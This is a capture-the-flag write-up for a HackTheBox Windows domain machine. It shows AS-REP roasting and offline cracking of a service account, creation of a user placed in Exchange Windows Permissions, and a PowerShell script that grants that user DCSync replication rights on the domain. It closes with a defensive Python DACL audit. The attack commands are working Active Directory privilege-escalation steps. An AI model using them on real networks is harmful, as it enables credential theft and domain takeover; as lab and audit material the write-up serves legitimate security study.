System Information
Initial Enumeration
It is a Windows machine, so we start with enum4linux:
Domain name: HTB
Users:
- andy (Andy Hislip)
- lucinda (Lucinda Berger)
- sebastien (Sebastien Caron)
- mark (Mark Brandt)
- santi (Santi Rodriguez)
- ezra
- svc-alfresco
After some checks we discover that svc-alfresco does not require Kerberos pre-authentication (the DONT_REQ_PREAUTH flag in its userAccountControl), so we can use the Impacket script GetNPUsers.py.
Without pre-authentication the KDC answers an AS-REQ for that account with an AS-REP for anyone who asks, no password needed. The encrypted part of that reply is keyed from the user's password, so the script prints it in a crackable format and the password can be brute-forced offline, without any failed logons being recorded against the account:
# ./GetNPUsers.py -request -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d935a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d
# john --wordlist=../../rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 24.38% (ETA: 03:58:12) 0g/s 334503p/s 334503c/s 334503C/s smf1180..smf,727
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:12 DONE (2019-11-04 03:57) 0.08176g/s 334072p/s 334072c/s 334072C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB:s3rvice
1 password hash cracked, 0 left
We can list shares with this account:
smbclient -L 10.10.10.161 -U "htb/svc-alfresco"
Enter HTB\svc-alfresco's password:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
The SMB1 error at the end only concerns smbclient's fallback attempt to browse the workgroup over SMB1; the share listing itself succeeded, and the only non-default shares are NETLOGON and SYSVOL.
Initial Foothold & User Flag
With the cracked password we can log in over WinRM as svc-alfresco:
From there we navigate to the user's desktop and read the user flag:
Root Flag
Further enumeration shows that svc-alfresco can create new domain users and add them to some groups, including "Exchange Windows Permissions". So I created a standard user, put it in that group, and also in "Remote Management Users" so it can log in over WinRM:
net user nik Nik-1234 /add
net group "Exchange Windows Permissions" nik /ADD /DOMAIN
net localgroup "Remote Management Users" nik /ADD
Once logged in as the new user over WinRM, I ran SharpHound to collect the Active Directory data and loaded it into BloodHound, which shows a path to Domain Admins:
The path goes from my user, through its membership in Exchange Windows Permissions, to the HTB.local domain object: that group holds WriteDacl on the domain, so a member can add arbitrary ACEs to the domain's DACL.
This is explained in:
I used the following command sequence (it needs the ActiveDirectory module, which provides the ad: drive; run it in the new user's WinRM session):
Import-Module ActiveDirectory
# DACL of the domain object we are going to modify
$acl = Get-Acl "ad:DC=htb,DC=local"
# SID of the current user (nik), a member of Exchange Windows Permissions
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = New-Object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid of the extended right DS-Replication-Get-Changes-All
$objectGuid = New-Object Guid "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# AddAccessRule only changes the in-memory copy; write the DACL back to the domain object
Set-Acl -AclObject $acl "ad:DC=htb,DC=local"
After the ACL is written back, nik holds the extended right DS-Replication-Get-Changes-All on the domain object. That is the right a domain controller uses to replicate directory data, secrets included, so a principal holding it can pull every account's password hash over the DRS replication protocol; this is exactly what DCSync does. One caveat: the DRSGetNCChanges call is checked against both DS-Replication-Get-Changes (rightsGuid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All, so if the dump is refused with an access-denied error, grant the first right with the same sequence and retry.
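A way to check the result before dumping, as an added example that is not the writeup's own code: a small Python audit that reads a domain object's DACL in SDDL form (what `(Get-Acl "ad:DC=htb,DC=local").Sddl` returns on the DC, or the nTSecurityDescriptor fetched over LDAP) and reports which principals can DCSync, i.e. hold both replication rights with no matching deny, and which hold WriteDacl and could therefore grant themselves those rights the way nik did. The sample SDDL, the domain SID and the RIDs are constructed; the three rightsGuid values are the real ones.

```python
"""Audit a domain object's DACL (as SDDL) for DCSync-capable and WriteDacl-holding principals."""
import re

# rightsGuid values of the three replication control-access rights
DS_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPL_RIGHTS = {
    DS_GET_CHANGES: "Get-Changes",
    DS_GET_CHANGES_ALL: "Get-Changes-All",
    DS_GET_CHANGES_FILTERED: "Get-Changes-In-Filtered-Set",
}
# access-mask bits we care about when SDDL spells the mask in hex instead of letter pairs
MASK_BITS = {0x100: "CR", 0x40000: "WD", 0x10000000: "GA"}


def parse_dacl(sddl: str):
    """Yield (ace_type, rights_codes, object_guid, sid) for every ACE in the D: section."""
    dacl = sddl.split("D:", 1)[1]
    if "S:" in dacl:  # a SACL may follow; ACE bodies never contain 'S:'
        dacl = dacl[: dacl.index("S:")]
    for body in re.findall(r"\(([^)]*)\)", dacl):
        ace_type, _flags, rights, obj_guid, _inh_guid, sid = body.split(";")[:6]
        if rights.startswith("0x"):
            mask = int(rights, 16)
            codes = {name for bit, name in MASK_BITS.items() if mask & bit}
        else:
            codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        yield ace_type, codes, obj_guid.lower(), sid


def audit_dcsync(sddl: str) -> dict:
    """Return who can DCSync (both replication rights, no deny) and who holds WriteDacl."""
    allowed, denied, write_dacl = {}, {}, set()
    for ace_type, codes, obj_guid, sid in parse_dacl(sddl):
        if "CR" in codes or "GA" in codes:
            # CR/GA with no object type covers every extended right; otherwise only the named one
            if obj_guid == "":
                names = set(REPL_RIGHTS.values())
            elif obj_guid in REPL_RIGHTS:
                names = {REPL_RIGHTS[obj_guid]}
            else:
                names = set()
            target = allowed if ace_type in ("A", "OA") else denied  # D / OD are deny ACEs
            target.setdefault(sid, set()).update(names)
        # WriteDacl or GenericAll on the object itself: the holder can add a DCSync ACE for itself
        if ace_type in ("A", "OA") and obj_guid == "" and ({"WD", "GA"} & codes):
            write_dacl.add(sid)
    needed = {"Get-Changes", "Get-Changes-All"}
    dcsync = sorted(sid for sid, r in allowed.items() if needed <= (r - denied.get(sid, set())))
    return {"dcsync": dcsync, "rights": allowed, "write_dacl": sorted(write_dacl)}


# Constructed sample: the domain SID and RIDs are made up; the layout follows what
# (Get-Acl "ad:DC=htb,DC=local").Sddl returns, with DA/DD/WD well-known aliases kept as-is.
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
NIK, EWP, BACKUP = f"{DOMAIN}-1601", f"{DOMAIN}-1120", f"{DOMAIN}-1150"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"        # Domain Admins: full control, no object type
    f"(A;CI;WD;;;{EWP})"                         # Exchange Windows Permissions: WriteDacl only
    f"(OA;;CR;{DS_GET_CHANGES};;DD)"             # Domain Controllers: all three replication rights
    f"(OA;;CR;{DS_GET_CHANGES_ALL};;DD)"
    f"(OA;;CR;{DS_GET_CHANGES_FILTERED};;DD)"
    f"(OA;;CR;{DS_GET_CHANGES_ALL};;{NIK})"      # nik after the script above: Get-Changes-All only
    f"(OA;;CR;{DS_GET_CHANGES};;{BACKUP})"       # backup account: both rights granted ...
    f"(OA;;CR;{DS_GET_CHANGES_ALL};;{BACKUP})"
    f"(OD;;CR;{DS_GET_CHANGES_ALL};;{BACKUP})"   # ... but Get-Changes-All explicitly denied
    "S:AI(AU;SA;WDWO;;;WD)"
)

if __name__ == "__main__":
    report = audit_dcsync(SAMPLE_SDDL)
    print("can DCSync:", report["dcsync"])
    print("hold WriteDacl:", report["write_dacl"])
    for sid, rights in report["rights"].items():
        print(f"  {sid}: {sorted(rights)}")
```

On the sample it reports Domain Admins (full control, hence every extended right) and Domain Controllers as DCSync-capable, lists nik with Get-Changes-All alone, and shows the deny ACE cancelling the backup account's grant; the WriteDacl entry for the Exchange Windows Permissions group is the escalation path this box is built around. Only the SDDL features used here are parsed, so treat it as a check on one object's DACL rather than a full SDDL implementation.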
Then we go back to Impacket and use secretsdump.py as the new user to dump all the domain password hashes and Kerberos keys over DCSync:
We don't need to crack any of them: we pass the Administrator NT hash to Impacket's wmiexec.py (pass-the-hash) and get a shell:
And with it the root flag.